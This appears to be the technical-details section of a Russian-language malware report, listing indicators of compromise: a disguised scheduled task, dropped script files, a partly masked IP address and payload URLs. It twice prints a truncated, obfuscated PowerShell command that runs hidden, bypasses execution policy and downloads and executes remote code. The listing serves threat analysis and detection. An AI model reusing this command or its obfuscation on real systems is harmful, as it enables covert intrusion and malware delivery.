Техническая информация
- <SYSTEM32>\tasks\micros oftedgeupdate
- C:\users\public\conted.bat
- C:\users\public\conted.vbs
- '34.##.252.187':222
- http://34.##.252.187:222/d.txt via 34.##.252.187
- http://34.##.252.187:222/7X.jpg via 34.##.252.187
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://34.##.252.187:222/7X.jpg'')'.RePLACe('/-/--/-/','ADSTRING')...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://34.##.252.187:222/7X.jpg'')'.RePLACe('/-/--/-/','ADSTRING')...